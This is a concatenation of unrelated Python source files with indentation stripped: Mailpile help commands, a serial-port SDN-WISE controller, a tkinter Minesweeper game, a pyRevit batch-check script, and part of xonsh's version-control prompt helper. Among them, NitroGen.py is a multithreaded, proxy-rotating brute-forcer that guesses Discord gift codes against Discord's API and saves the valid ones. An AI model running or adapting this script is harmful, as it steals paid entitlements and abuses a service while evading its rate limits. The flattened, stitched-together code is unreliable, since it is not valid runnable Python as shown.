if last_rank and int(rank / 10) != last_rank:
text.append('')
last_rank = int(rank / 10)
if c[0] == '_':
c = ' '
else:
c = '%s|' % c[0]
fmt = ' %%s%%-%d.%ds' % (width, width)
if explanation:
if len(args or '') <= arg_width:
fmt += ' %%-%d.%ds %%s' % (arg_width, arg_width)
else:
pad = len(c) + width + 3 + arg_width
fmt += ' %%s\n%s %%s' % (' ' * pad)
else:
explanation = ''
fmt += ' %s %s '
text.append(fmt % (c, cmd.replace('=', ''),
args and ('%s' % (args, )) or '',
(explanation.splitlines() or [''])[0]))
if self.result.get('tags'):
text.extend([
'',
_('Tags: (use a tag as a command to display tagged '
'messages)'),
'',
self.result['tags'].as_text()
])
return '\n'.join(text)
def as_text(self):
if not self.result:
return _('Error')
return ''.join([
('splash' in self.result) and self.splash_as_text() or '',
(('variables' in self.result) and self.variables_as_text()
or ''),
('commands' in self.result) and self.commands_as_text() or '',
])
def command(self):
config = self.session.config
self.session.ui.reset_marks(quiet=True)
if self.args:
command = self.args[0]
for cls in COMMANDS:
name = cls.SYNOPSIS[1] or cls.SYNOPSIS[2]
width = len(name or '')
if name and name == command:
order = 1
cmd_list = {'_main': (name, cls.SYNOPSIS[3],
cls.__doc__, order)}
subs = [c for c in COMMANDS
if (c.SYNOPSIS[1] or c.SYNOPSIS[2] or ''
).startswith(name + '/')]
for scls in sorted(subs):
sc, scmd, surl, ssynopsis = scls.SYNOPSIS[:4]
order += 1
cmd_list['_%s' % scmd] = (scmd, ssynopsis,
scls.__doc__, order)
width = max(len(scmd or surl), width)
return self._success(_('Displayed help'), result={
'pre': cls.__doc__,
'commands': cmd_list,
'width': width
})
return self._error(_('Unknown command'))
else:
cmd_list = {}
count = 0
for grp in COMMAND_GROUPS:
count += 10
for cls in COMMANDS:
if cls.CONFIG_REQUIRED and not config.loaded_config:
continue
c, name, url, synopsis = cls.SYNOPSIS[:4]
if cls.ORDER[0] == grp and '/' not in (name or ''):
cmd_list[c or '_%s' % name] = (name, synopsis,
cls.__doc__,
count + cls.ORDER[1])
if config.loaded_config:
tags = GetCommand('tags')(self.session).run()
else:
tags = {}
try:
index = self._idx()
except IOError:
index = None
return self._success(_('Displayed help'), result={
'commands': cmd_list,
'tags': tags,
'index': index
})
def _starting(self):
pass
def _finishing(self, rv, *args, **kwargs):
return self.CommandResult(self, self.session, self.name,
self.__doc__, rv,
self.status, self.message)
class HelpVars(Help):
"""Print help on Mailpile variables"""
SYNOPSIS = (None, 'help/variables', 'help/variables', None)
ABOUT = ('The available mailpile variables')
ORDER = ('Config', 9)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
def command(self):
config = self.session.config.rules
result = []
categories = ["sys", "prefs", "profiles"]
for cat in categories:
variables = []
what = config[cat]
if isinstance(what[2], dict):
for ii, i in what[2].iteritems():
variables.append({
'var': ii,
'type': str(i[1]),
'desc': i[0]
})
variables.sort(key=lambda k: k['var'])
result.append({
'category': cat,
'name': config[cat][0],
'variables': variables
})
result.sort(key=lambda k: config[k['category']][0])
return self._success(_('Displayed variables'),
result={'variables': result})
class HelpSplash(Help):
"""Print Mailpile splash screen"""
SYNOPSIS = (None, 'help/splash', 'help/splash', None)
ORDER = ('Config', 9)
CONFIG_REQUIRED = False
def command(self, interactive=True):
from mailpile.auth import Authenticate
http_worker = self.session.config.http_worker
in_browser = False
if http_worker:
http_url = 'http://%s:%s/' % http_worker.httpd.sspec
if ((sys.platform[:3] in ('dar', 'win') or os.getenv('DISPLAY'))
and self.session.config.prefs.open_in_browser):
if BrowseOrLaunch.Browse(http_worker.httpd.sspec):
in_browser = True
time.sleep(2)
else:
http_url = ''
return self._success(_('Displayed welcome message'), result={
'splash': self.ABOUT,
'http_url': http_url,
'in_browser': in_browser,
'login_cmd': (Authenticate.SYNOPSIS[1]
if not self.session.config.loaded_config else ''),
'interactive': interactive
})
def GetCommand(name):
match = [c for c in COMMANDS if name in c.SYNOPSIS[:3]]
if len(match) == 1:
return match[0]
return None
def Action(session, opt, arg, data=None):
session.ui.reset_marks(quiet=True)
config = session.config
if not opt:
return Help(session, 'help').run()
# Use the COMMANDS dict by default.
command = GetCommand(opt)
if command:
return command(session, opt, arg, data=data).run()
# Tags are commands
if config.loaded_config:
tag = config.get_tag(opt)
if tag:
a = 'in:%s%s%s' % (tag.slug, ' ' if arg else '', arg)
return GetCommand('search')(session, opt, arg=a, data=data).run()
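    # For example, if a tag with the slug 'inbox' exists, typing `inbox` on
    # the CLI is equivalent to running `search in:inbox`.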
# OK, give up!
raise UsageError(_('Unknown command: %s') % opt)
# Commands starting with _ don't get single-letter shortcodes...
COMMANDS = [
Load, Optimize, Rescan, BrowseOrLaunch, RunWWW, ProgramStatus,
GpgCommand, ListDir, ChangeDir, CatFile,
WritePID, ConfigPrint, ConfigSet, ConfigAdd, ConfigUnset, AddMailboxes,
RenderPage, Cached, Output, Pipe,
Help, HelpVars, HelpSplash, Quit, TrustingQQQ, Abort
]
COMMAND_GROUPS = ['Internals', 'Config', 'Searching', 'Tagging', 'Composing']
|
PythonController.py
|
#!/usr/bin/env python
import sys
import time
import serial
import networkx as nx
import threading
from threading import Thread
from datetime import datetime
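# Serial protocol, as inferred from the parsing code below (not a formal
# spec): the mote first sends a line containing 'Report' or 'Request',
# followed by a comma-separated line of integers.  In a report, element 0 is
# the reporting node id and, starting at element 2, every group of three
# holds <neighbour id, (unused), link weight>; in a request, elements 0 and 2
# are the source and destination node ids.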
def readUART(Topo):
try:
ser = serial.Serial('/dev/ttyUSB1',115200)
#time.sleep(10)
prev_length = []
length = []
for t in range(10):
prev_length.append(0)
length.append(0)
while 1:
#time.sleep(3)
mtype = ser.readline()
if 'Report' in mtype:
topo = ser.readline()
print 'Topo:'+topo
topoarray = map(int, topo.split(","))
#print datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
#print datetime.now().strftime('%H:%M:%S.%f')[:-3]
print datetime.now().strftime('%H:%M:%S.%f')
print "Topo in Array:"
print topoarray
for s in range(10): #10 nodes assumed
if topoarray[0] == s+1:
length[s] = len(topoarray)
print length[s]
if length[s] != prev_length[s]:#topology changes
if topoarray[0] == 3: #will be 2
resetcommand = str(2)
resetcommand += str(2)
resetcommand += 'r'
resetcommand += 'f'
resetcommand += str(2)
resetcommand += str('\n')
print "Reset Command to send: "+resetcommand
bauni = bytearray(resetcommand)
ser.write(bauni)
print "Reset Command Sent at "
print datetime.now().strftime('%H:%M:%S.%f')
Topo.clear()
prev_length[s] = length[s]
Topo.add_node(topoarray[0])
for num in range(2,len(topoarray)-2,3):
Topo.add_node(topoarray[num])
Topo.add_edge(topoarray[0], topoarray[num],weight=topoarray[num+2])
Topo.add_edge(topoarray[num], topoarray[0],weight=topoarray[num+2])
print Topo.nodes()
print Topo.edges(data=True)
#for (u,v,d) in Topo.edges(data=True):
# print d['weight']
elif 'Request' in mtype:
print datetime.now().strftime('%H:%M:%S.%f')
req = ser.readline()
print 'Request:'+req
reqarray = map(int, req.split(","))
print "Request in Array:"
print reqarray
print 'Shortest Path from %d to %d: ' % (reqarray[0], reqarray[2])
try:
                    shortpath = nx.dijkstra_path(Topo, reqarray[0], reqarray[2], weight='weight')
print shortpath
#if (reqarray[0] == 1 and (len(shortpath) > 2)):
if (len(shortpath) > 2):
nxh = shortpath[1]
for x in range(len(shortpath)-1):
unicastcommand = str(shortpath[0]-1)
unicastcommand += str(shortpath[0]-1)
unicastcommand += 'u'
unicastcommand += str(shortpath[x+1]-1)
unicastcommand += str(nxh-1)
unicastcommand += str('\n')
print "Unicast Command to send: "+unicastcommand
bauni = bytearray(unicastcommand)
ser.write(bauni)
print datetime.now().strftime('%H:%M:%S.%f')
print "Command written to serial port"
time.sleep(2)
else:
unicastcommand = str(shortpath[0]-1)
unicastcommand += str(shortpath[0]-1)
unicastcommand += 'u'
unicastcommand += str(shortpath[1]-1)
unicastcommand += str(shortpath[1]-1)
unicastcommand += str('\n')
print "Unicast Command to send: "+unicastcommand
bauni = bytearray(unicastcommand)
ser.write(bauni)
print datetime.now().strftime('%H:%M:%S.%f')
# for x in range(len(shortpath)-1):
# unicastcommand = str(shortpath[x]-1)
# unicastcommand += str(shortpath[x]-1)
# unicastcommand += 'u'
# unicastcommand += str(shortpath[x+1]-1)
# unicastcommand += str(shortpath[x+1]-1)
# unicastcommand += str('\n')
# print "Unicast Command to send: "+unicastcommand
# bauni = bytearray(unicastcommand)
# ser.write(bauni)
except Exception:
#dropcommand = str(reqarray[0]-1)
#dropcommand += str(reqarray[0]-1)
#dropcommand += 'd'
#dropcommand += str(reqarray[2]-1)
#dropcommand += str(reqarray[2]-1)
#dropcommand += str('\n')
#print "Drop Packet Command to send: "+dropcommand
#babro = bytearray(dropcommand)
#ser.write(babro)
print "Node %d not reachable from %d" % (reqarray[2],reqarray[0])
else:
print mtype
except (KeyboardInterrupt):
sys.exit()
def writeUART(Topo):
try:
ser = serial.Serial('/dev/ttyUSB1',115200)
#time.sleep(10)
#status = raw_input('Please enter your command - write Exit to quit\n')
print 'Please enter your command - write Exit to quit\n'
status = sys.stdin.readline()
while 1:
ba = bytearray(status)
ser.write(ba)
if status == 'Exit':
ser.close()
sys.exit()
break
#status = raw_input('Please enter your command - write Exit to quit\n')
print 'Please enter your command - write Exit to quit\n'
status = sys.stdin.readline()
except (KeyboardInterrupt):
sys.exit()
if __name__=='__main__':
print datetime.now().strftime('%H:%M:%S.%f')
print("Simple Python Controller for SDN-WISE Starting .....")
Topo = nx.DiGraph()
threadwrite = threading.Thread(target = writeUART, args = [Topo])
    threadwrite.daemon = True
threadwrite.start()
threadread = threading.Thread(target = readUART, args = [Topo])
    threadread.daemon = True
threadread.start()
|
main.py
|
from tkinter import *
from tkinter import messagebox
import time
import threading
import random
time_limit = 0
stop_event = False
free_cells = 0
total_free_cells = 0
first_move = True
class Entry_number(Entry):
"""
A class that was used in the Main Menu in order to make Entry Boxes
    that don't accept invalid inputs (characters other than digits).
"""
def __init__(self, master=None, **kwargs):
self.var = StringVar()
Entry.__init__(self, master, textvariable=self.var, **kwargs)
self.old_value = ''
self.var.trace('w', self.check)
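        # The 'w' trace fires on every write to the StringVar, so check() can
        # immediately roll back any edit that is not purely numeric.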
self.get, self.set = self.var.get, self.var.set
def check(self, *args):
if self.get().isdigit() or self.get() == "":
self.old_value = self.get()
else:
self.set(self.old_value)
"""
The main scope was used to initialize all the widgets and to place them
inside frames so that they are easier to access later on.
The widgets are aligned in a grid. The tkinter class Frame was used in
order to align multiple elements. When the screen is resized, the widgets
will change their position accordingly.
"""
root = Tk()
root.geometry("600x600")
root.title("Minesweeper")
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
image_face_happy = PhotoImage(file="./textures/face_happy.png")
image_face_happy = image_face_happy.zoom(20)
image_face_happy = image_face_happy.subsample(32)
image_face_dead = PhotoImage(file="./textures/face_dead.png")
image_face_dead = image_face_dead.zoom(10)
image_face_dead = image_face_dead.subsample(32)
image_unpressed = PhotoImage(file="./textures/unpressed.png")
image_pressed = PhotoImage(file="./textures/pressed.png")
image_numbers = [
PhotoImage(file="./textures/1.png"),
PhotoImage(file="./textures/2.png"),
PhotoImage(file="./textures/3.png"),
PhotoImage(file="./textures/4.png"),
PhotoImage(file="./textures/5.png"),
PhotoImage(file="./textures/6.png"),
PhotoImage(file="./textures/7.png"),
PhotoImage(file="./textures/8.png"),
]
image_flag = PhotoImage(file="./textures/flag.png")
image_bombpressed = PhotoImage(file="./textures/bombpressed.png")
image_bombred = PhotoImage(file="./textures/bombred.png")
image_bombx = PhotoImage(file="./textures/bombx.png")
image_win_button = PhotoImage(file="./textures/win_button.png")
image_lose_button = PhotoImage(file="./textures/lose_button.png")
main_menu_frame = Frame(root)
main_menu_frame.grid(row=0, column=0, sticky='news')
main_menu_frame.columnconfigure(0, weight=1)
main_menu_frame.rowconfigure(0, weight=1)
main_menu_frame.rowconfigure(1, weight=1)
game_name_frame = Frame(main_menu_frame)
game_name_frame.grid(row=0, column=0, sticky='news')
game_name_frame.columnconfigure(0, weight=1)
game_name_label = Label(game_name_frame, text="Minesweeper")
game_name_label.grid(row=0, padx=20, pady=10, column=0)
game_name_label.config(font=("Courier", 30))
menu_image = Label(game_name_frame, image=image_face_happy)
menu_image.grid(row=1, column=0)
game_options_frame = Frame(main_menu_frame)
game_options_frame.grid(row=1, column=0, sticky='n')
group_options1_frame = Frame(game_options_frame)
group_options1_frame.grid(row=0, column=0)
group_options2_frame = Frame(game_options_frame)
group_options2_frame.grid(row=0, column=1)
table_size_label = Label(group_options1_frame, text="Table size:")
table_size_label.grid(row=0, column=0, padx=10, pady=10, sticky="w")
table_size_label.config(font=("Arial", 15))
table_size_entry_height = Entry_number(group_options2_frame,
font="Arial 15", width="3")
table_size_entry_height.grid(row=0, column=0, padx=10, pady=10)
table_size_x_label = Label(group_options2_frame, text="X")
table_size_x_label.grid(row=0, column=1, pady=10)
table_size_x_label.config(font=("Arial", 15))
table_size_entry_width = Entry_number(group_options2_frame,
font="Arial 15", width="3")
table_size_entry_width.grid(row=0, column=2, padx=10, pady=10)
time_limit_label = Label(group_options1_frame, text="Time Limit:")
time_limit_label.grid(row=1, column=0, padx=10, pady=10, sticky="w")
time_limit_label.config(font=("Arial", 15))
time_limit_entry = Entry_number(group_options2_frame,
font="Arial 15", width="3")
time_limit_entry.grid(row=1, column=0, padx=10, pady=10)
nr_bombs_label = Label(group_options1_frame, text="Bombs:")
nr_bombs_label.grid(row=2, column=0, padx=10, pady=10, sticky="w")
nr_bombs_label.config(font=("Arial", 15))
nr_bombs_entry = Entry_number(group_options2_frame,
font="Arial 15", width="3")
nr_bombs_entry.grid(row=2, column=0, padx=10, pady=10)
start_game_frame = Frame(game_options_frame)
start_game_frame.grid(row=1, column=0, columnspan=2, sticky="we")
start_game_frame.columnconfigure(0, weight=1)
start_game_frame.rowconfigure(0, weight=1)
def mainMenu(itself):
"""
A function that is called in order to return to the main
menu.
The Main Menu frame is kept in memory and re-added once the
user clicks the Main Menu button.
"""
itself.grid_forget()
root.geometry("600x600")
main_menu_frame.grid(row=0, column=0, sticky='news')
def startGame():
"""
The function that is called when the user clicks the Start Game button.
When the user starts a game, the program first checks whether the given
inputs are valid; otherwise an error message is shown using the
tkinter "messagebox" module.
If all the inputs are valid, the game generates a matrix in which it
places the bombs. First, every grid position is added to a list; for each
bomb a random position is picked and then removed from the list. This
eliminates the possibility of two bombs being placed in the same position.
The program then creates a grid of buttons representing the cells and
attaches left-click and right-click events, as well as images, to them.
"""
if table_size_entry_height.get() == ""\
and table_size_entry_width.get() != "":
messagebox.showerror("Error", "Height has to be filled")
elif table_size_entry_height.get() != ""\
and table_size_entry_width.get() == "":
messagebox.showerror("Error", "Width has to be filled")
elif table_size_entry_height.get() != ""\
and int(table_size_entry_height.get()) == 0:
messagebox.showerror("Error", "Height has to be positive")
elif table_size_entry_width.get() != ""\
and int(table_size_entry_width.get()) == 0:
messagebox.showerror("Error", "Width has to be positive")
elif table_size_entry_height.get() == ""\
and table_size_entry_width.get() == ""\
and nr_bombs_entry.get() != ""\
and int(nr_bombs_entry.get()) > 10 * 10 - 1:
messagebox.showerror("Error", "Nr of bombs exceeds table size")
elif table_size_entry_height.get() != ""\
and table_size_entry_width.get() != ""\
and nr_bombs_entry.get() != ""\
and int(nr_bombs_entry.get()) >\
int(table_size_entry_height.get()) *\
int(table_size_entry_width.get()) - 1:
messagebox.showerror("Error", "Nr of bombs exceeds table size")
elif table_size_entry_height.get() != ""\
and table_size_entry_width.get() != ""\
and nr_bombs_entry.get() == ""\
and 10 > int(table_size_entry_height.get()) *\
int(table_size_entry_width.get()) - 1:
messagebox.showerror("Error", "Nr of bombs exceeds table size")
else:
main_menu_frame.grid_forget()
nr_bombs = 10
table_height = 10
table_width = 10
global time_limit
global stop_event
global free_cells
global total_free_cells
global first_move
first_move = True
stop_event = False
time_limit = 60
if table_size_entry_height.get() != ""\
and table_size_entry_width.get() != "":
table_height = int(table_size_entry_height.get())
table_width = int(table_size_entry_width.get())
if nr_bombs_entry.get() != "":
nr_bombs = int(nr_bombs_entry.get())
if time_limit_entry.get() != "":
time_limit = int(time_limit_entry.get())
total_free_cells = (table_height * table_width) - nr_bombs
free_cells = 0
available_positions = []
for i in range(table_height):
for j in range(table_width):
available_positions.append([i, j])
bomb_matrix = [[0 for i in range(table_width)]
for y in range(table_height)]
flag_matrix = [[0 for i in range(table_width)]
for y in range(table_height)]
for i in range(nr_bombs):
r = random.randint(0, len(available_positions) - 1)
bomb_matrix[
available_positions[r][0]
][available_positions[r][1]] = 1
del available_positions[r]
root.geometry("")
main_game_frame = Frame(root)
main_game_frame.grid(row=0, column=0, sticky='news')
main_game_frame.rowconfigure(0, weight=1)
main_game_frame.rowconfigure(1, weight=1)
main_game_frame.columnconfigure(0, weight=1)
top_frame = Frame(main_game_frame)
top_frame.grid(row=0, column=0, sticky='n')
time_limit_label = Label(top_frame, font="Arial 20",
text='Time: {:02}:{:02}'.format(
time_limit % 3600//60, time_limit % 60
))
time_limit_label.grid(row=0, column=0, pady=10)
game_frame = Frame(main_game_frame)
game_frame.grid(row=1, column=0, padx=20, pady=20, sticky='n')
button_matrix = [[0 for i in range(table_width)]
for y in range(table_height)]
def finalTable(x, y, reason):
"""
The function that displays the final board after the game has
ended.
When the game ends, the program checks the button grid against the bomb
matrix and the flag matrix in order to correctly place the images. An
additional button is placed where the countdown timer was, allowing the
user to return to the Main Menu.
"""
global stop_event
stop_event = True
time_limit_label.grid_forget()
reset_button = Button(top_frame)
reset_button.grid(row=0, column=0, pady=14)
reset_button['command'] = \
lambda itself = main_game_frame: mainMenu(itself)
if reason == 'lost' or reason == 'time':
reset_button['image'] = image_lose_button
elif reason == 'won':
reset_button['image'] = image_win_button
for i in range(table_height):
for j in range(table_width):
button_matrix[i][j]['relief'] = 'sunken'
button_matrix[i][j]['command'] = 0
if bomb_matrix[i][j] == 1 and flag_matrix[i][j] == 1:
button_matrix[i][j]['image'] = image_bombx
elif bomb_matrix[i][j] == 1 and flag_matrix[i][j] == 0:
button_matrix[i][j]['image'] = image_bombpressed
if bomb_matrix[x][y] == 1 and reason != 'time':
button_matrix[x][y]['image'] = image_bombred
def countdown():
"""
The function run by the countdown daemon thread.
In order to display the remaining time, a daemon thread is launched that
sleeps for one second at a time and then updates a global variable
and the timer label.
"""
global time_limit
global stop_event
while time_limit > 0 and not stop_event:
time.sleep(1)
time_limit -= 1
time_limit_label['text'] = 'Time: {:02}:{:02}'.format(
time_limit % 3600//60, time_limit % 60)
if not stop_event:
finalTable(0, 0, 'time')
countdown_thread = threading.Thread(target=countdown)
countdown_thread.daemon = True
countdown_thread.start()
def walk(x, y):
"""
The function that walks the board recursively to reveal
positions.
To walk the board, the program first checks whether the cell
the player clicked on contains a bomb. If it does contain a
bomb, the final board is shown and the game ends. An extra
check moves the bomb to another cell if it is the player's
first move. If the cell does not contain a bomb, the program
counts the number of neighbouring bombs. If that number is
greater than 0, the recursion stops and only the current
position is updated with the number of bombs. If it is 0, the
function is called recursively for every neighbour.
"""
global free_cells
global first_move
if bomb_matrix[x][y] == 1:
if first_move:
bomb_matrix[x][y] = 0
r = random.randint(0, len(available_positions) - 1)
bomb_matrix[
available_positions[r][0]
][available_positions[r][1]] = 1
walk(x, y)
else:
finalTable(x, y, 'lost')
elif button_matrix[x][y]['relief'] != 'sunken'\
and flag_matrix[x][y] == 0:
free_cells += 1
direct_x = [-1, -1, -1, 0, 0, 1, 1, 1]
direct_y = [0, -1, 1, -1, 1, -1, 0, 1]
nr_bombs = 0
for i in range(len(direct_x)):
if x + direct_x[i] < table_height\
and x + direct_x[i] >= 0\
and y + direct_y[i] < table_width\
and y + direct_y[i] >= 0:
if bomb_matrix[x + direct_x[i]][y + direct_y[i]] == 1:
nr_bombs += 1
if nr_bombs == 0:
button_matrix[x][y]['command'] = 0
button_matrix[x][y]['relief'] = 'sunken'
button_matrix[x][y]['image'] = image_pressed
for i in range(len(direct_x)):
if x + direct_x[i] < table_height\
and x + direct_x[i] >= 0\
and y + direct_y[i] < table_width\
and y + direct_y[i] >= 0:
walk(x + direct_x[i], y + direct_y[i])
else:
button_matrix[x][y]['command'] = 0
button_matrix[x][y]['relief'] = 'sunken'
button_matrix[x][y]['image'] = image_numbers[nr_bombs - 1]
def click(button):
"""
The function that gets called when the user left clicks on a
button.
When the user left-clicks a button, the left-click event calls
a function that recursively walks the board in order to expand
cells. After every walk the program checks the number of
discovered cells to see whether the user has won.
"""
global free_cells
global total_free_cells
global first_move
x = button.grid_info()['row']
y = button.grid_info()['column']
walk(x, y)
first_move = False
if free_cells == total_free_cells and total_free_cells != 0:
finalTable(x, y, 'won')
def right_click(event):
"""
The function that gets called when the user right clicks on
a button.
When the user right clicks a button, that cell will be marked
with a flag. If a flag is already present, it will be removed.
Flags stop the propagation of the walk function on that
respective cell.
"""
x = event.widget.grid_info()['row']
y = event.widget.grid_info()['column']
if button_matrix[x][y]['relief'] != 'sunken':
if flag_matrix[x][y] == 1:
flag_matrix[x][y] = 0
button_matrix[x][y]['image'] = image_unpressed
button_matrix[x][y]['command'] = \
lambda button = button_matrix[x][y]: click(button)
else:
flag_matrix[x][y] = 1
button_matrix[x][y]['image'] = image_flag
button_matrix[x][y]['command'] = 0
for i in range(table_height):
for j in range(table_width):
button_matrix[i][j] = Button(game_frame,
image=image_unpressed)
button_matrix[i][j]['command'] =\
lambda button = button_matrix[i][j]: click(button)
button_matrix[i][j].bind("<Button-2>", right_click)
button_matrix[i][j].bind("<Button-3>", right_click)
button_matrix[i][j].grid(row=i, column=j)
start_game_button = Button(start_game_frame, text="Start",
font="Arial 15", command=startGame)
start_game_button.grid(row=2, column=0, padx=10, pady=10, sticky="we")
root.mainloop()
|
script.py
|
import sys
import ConfigParser
from os.path import expanduser
# Set system path
home = expanduser("~")
cfgfile = open(home + "\\STVTools.ini", 'r')
config = ConfigParser.ConfigParser()
config.read(home + "\\STVTools.ini")
# Master Path
syspath1 = config.get('SysDir','MasterPackage')
sys.path.append(syspath1)
# Built Path
syspath2 = config.get('SysDir','SecondaryPackage')
sys.path.append(syspath2)
from pyrevit.framework import List
from pyrevit import revit, DB, forms
import re, clr, os, threading
import EwrQcUtils
import xlsxwriter
clr.AddReference('RevitAPI')
clr.AddReference("System")
from Autodesk.Revit.DB import FilteredElementCollector, Transaction, ImportInstance, \
OpenOptions,WorksetConfiguration, WorksetConfigurationOption, DetachFromCentralOption,\
ModelPathUtils, SaveAsOptions, WorksharingSaveAsOptions
from System.Collections.Generic import List
from Autodesk.Revit.UI.Events import DialogBoxShowingEventArgs
from Autodesk.Revit.UI import UIApplication
from Autodesk.Revit.ApplicationServices import Application
clr.AddReferenceByPartialName('PresentationCore')
clr.AddReferenceByPartialName('PresentationFramework')
clr.AddReferenceByPartialName('System.Windows.Forms')
clr.AddReference('RevitAPIUI')
# Collect Save location and Rvt Files
collectorFiles = forms.pick_file(file_ext='rvt', multi_file=True, unc_paths=False)
destinationFolder = forms.pick_folder()
def RVTFileCollector(dir):
files = []
for file in os.listdir(dir):
if file.endswith(".rvt"):
#print(str(file))
files.append(str(file))
print(files)
return files
def OpenFiles(oFile, app, audit):
openOpt = OpenOptions()
if audit == True:
openOpt.Audit = True
else:
openOpt.Audit = False
openOpt.DetachFromCentralOption = DetachFromCentralOption.DetachAndPreserveWorksets
wsopt = WorksetConfiguration(WorksetConfigurationOption.CloseAllWorksets)
# wsopt.Open(worksetList)
openOpt.SetOpenWorksetsConfiguration(wsopt)
modelPath = ModelPathUtils.ConvertUserVisiblePathToModelPath(oFile)
currentdoc = app.OpenDocumentFile(modelPath, openOpt)
try:
DialogBoxShowingEventArgs.OverrideResult(1)
except:
pass
return currentdoc
# Main
uidoc = __revit__.ActiveUIDocument
doc = __revit__.ActiveUIDocument.Document
__doc__ = 'Open projects and resave in a specific location. '\
'Please do not use it lightly.'
uiapp = UIApplication(doc.Application)
application = uiapp.Application
def ElementsProcessing(openedDoc, name):
collectorFamily = EwrQcUtils.ElementinWorksetCheck(openedDoc)
EwrQcUtils.ExcelWriter(excelFile, name, 1, 0, collectorFamily)
# Transaction
if len(collectorFiles) > 0:
t = Transaction(doc, 'Check QAQC Elements')
t.Start()
fileName = destinationFolder + '\\' + 'LOD Check File' + '.xlsx'
excelFile = EwrQcUtils.ExcelOpener(fileName)
for aDoc in collectorFiles:
openedDoc = OpenFiles(aDoc, application, audit = False)
print(str(openedDoc.Title) + ' Opened')
workshareOp = WorksharingSaveAsOptions()
# Define the name and location of excel file
rawTitle = re.split('detached', openedDoc.Title)[0]
title = rawTitle[0:len(rawTitle) -1]
# Define and Open Excel File
# Run the element check for this document and wait for it to finish before closing
processingThread = threading.Thread(name=title, target=ElementsProcessing, args=(openedDoc, title))
processingThread.start()
processingThread.join()
# Close Excel and Revit File
openedDoc.Close(False)
excelFile.close()
print('File Saved')
t.Commit()
else:
forms.alert('No File is selected', title='', sub_msg=None, expanded=None, footer='', ok=True, cancel=False, yes=False,
no=False, retry=False, warn_icon=True, options=None, exitscript=False)
|
NitroGen.py
|
import requests
import string
import random
from sys import argv, exit
from threading import Thread
try:
caracteres = int(argv[1])
threads = int(argv[2])
proxys = argv[3]
except:
print('Error: set the number of characters, the number of threads and a proxy list file!')
exit()
proxys = open(proxys, 'r')
proxys = proxys.readlines()
def getandchk(caracteres, proxys):
while True:
for proxy in proxys:
try:
proxya = proxy.strip()
proxy = {'https': proxya}
header = {'user-agent': 'Mozilla/5.0'}
code = ('').join(random.choices(string.ascii_letters + string.digits, k=caracteres))
url = ('https://discordapp.com/api/v6/entitlements/gift-codes/{0}?with_application=false&with_subscription_plan=true'.format(code))
r = requests.get(url=url, proxies=proxy, headers=header, timeout=24)
if 'Unknown' in r.text:
print('#Die', code, proxya)
else:
save = open('goodnitro.txt', 'a')
save.write('#Live {} {}\n'.format(code, proxya))
save.close()
print('#Live', code, proxya)
except:
print('#Error', code, proxya)
for i in range(threads):
t = Thread(target=getandchk, args=(caracteres, proxys))
t.start()
t.join(0.5)
|
vc.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branches"""
# pylint:disable=no-member, invalid-name
import os
import sys
import queue
import builtins
import threading
import subprocess
import re
import pathlib
import xonsh.tools as xt
from xonsh.lazyasd import LazyObject
RE_REMOVE_ANSI = LazyObject(
lambda: re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]"),
globals(),
"RE_REMOVE_ANSI",
)
def _get_git_branch(q):
denv = builtins.__xonsh__.env.detype()
try:
cmd = ["git", "rev-parse", "--abbrev-ref", "HEAD"]
branch = xt.decode_bytes(
subprocess.check_output(cmd, env=denv, stderr=subprocess.DEVNULL)
)
branch = branch.splitlines()[0] or None
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(branch)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
if branch:
branch = RE_REMOVE_ANSI.sub("", branch)
except queue.Empty:
branch = None
return branch
def _get_hg_root(q):
_curpwd = builtins.__xonsh__.env["PWD"]
while True:
if not os.path.isdir(_curpwd):
return False
try:
dot_hg_is_in_curwd = any([b.name == ".hg" for b in xt.scandir(_curpwd)])
except OSError:
return False
if dot_hg_is_in_curwd:
q.put(_curpwd)
break
else:
_oldpwd = _curpwd
_curpwd = os.path.split(_curpwd)[0]
if _oldpwd == _curpwd:
return False
def get_hg_branch(root=None):
"""Try to get the mercurial branch of the current directory,
return None if not in a repo or subprocess.TimeoutExpired if timed out.
"""
env = builtins.__xonsh__.env
timeout = env["VC_BRANCH_TIMEOUT"]
q = queue.Queue()
t = threading.Thread(target=_get_hg_root, args=(q,))
t.start()
t.join(timeout=timeout)
try:
root = pathlib.Path(q.get_nowait())
except queue.Empty:
return None
if env.get("VC_HG_SHOW_BRANCH"):
# get branch name
branch_path = root / ".hg" / "branch"
if branch_path.exists():
with open(branch_path, "r") as branch_file:
branch = branch_file.read().strip()
else:
branch = "default"
else:
branch = ""
# add activated bookmark and topic
for filename in ["bookmarks.current", "topic"]:
feature_branch_path = root / ".hg" / filename
if feature_branch_path.exists():
with open(feature_branch_path) as file:
feature_branch = file.read().strip()
if feature_branch:
if branch:
if filename == "topic":
branch = f"{branch}/{feature_branch}"
else:
branch = f"{branch}, {feature_branch}"
else:
branch = feature_branch
return branch
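# Editor's note: illustrative examples of the strings produced above. With
# $VC_HG_SHOW_BRANCH set and branch "default", an active topic "feature-x"
# yields "default/feature-x", while an active bookmark "mybook" yields
# "default, mybook"; without $VC_HG_SHOW_BRANCH only the bookmark/topic name
# itself is returned.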
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh__.env["SUPPRESS_BRANCH_TIMEOUT_MESSAGE"]
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print(
"xonsh: branch timeout: computing the branch name, color, or both "
"timed out while formatting the prompt. You may avoid this by "
"increasing the value of $VC_BRANCH_TIMEOUT or by removing branch "
"fields, like {curr_branch}, from your $PROMPT. See the FAQ "
"for more details. This message will be suppressed for the remainder "
"of this session. To suppress this message permanently, set "
"$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.",
file=sys.stderr,
)
def _vc_has(binary):
""" This allows us to locate binaries after git only if necessary """
cmds = builtins.__xonsh__.commands_cache
